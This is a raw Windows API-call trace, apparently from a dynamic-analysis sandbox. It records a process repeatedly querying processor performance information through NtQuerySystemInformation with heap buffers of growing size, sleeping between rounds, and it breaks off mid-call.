[0181.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.313] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.365] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.367] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.368] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.368] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.371] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.371] Sleep (dwMilliseconds=0x110) [0181.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.442] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.443] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.443] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.443] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.444] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.444] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.445] Sleep (dwMilliseconds=0x110) [0181.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.490] Sleep (dwMilliseconds=0x110) [0181.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.554] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.557] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.557] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.558] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.558] Sleep (dwMilliseconds=0x110) [0181.618] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.618] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.619] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.619] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.620] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.630] Sleep (dwMilliseconds=0x110) [0181.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.740] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.741] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.741] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.741] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.742] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.742] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.742] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.746] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.746] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.747] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.749] Sleep (dwMilliseconds=0x110) [0181.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.829] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.832] Sleep (dwMilliseconds=0x110) [0181.853] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0181.853] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.854] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0181.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0181.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0181.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0181.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0181.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.863] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0181.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0181.863] Sleep (dwMilliseconds=0x110) [0182.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.099] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.101] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.105] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.108] Sleep (dwMilliseconds=0x110) [0182.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.175] Sleep (dwMilliseconds=0x110) [0182.211] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.211] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.212] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.212] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.212] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.213] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.213] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.213] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.213] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.214] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.214] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.214] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.215] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.217] Sleep (dwMilliseconds=0x110) [0182.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.282] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.285] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.286] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.287] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.287] Sleep (dwMilliseconds=0x110) [0182.620] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.620] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.621] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.621] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.621] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.627] Sleep (dwMilliseconds=0x110) [0182.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0182.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0182.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0182.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0182.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0182.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0182.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0182.645] Sleep (dwMilliseconds=0x110) [0182.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0182.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, 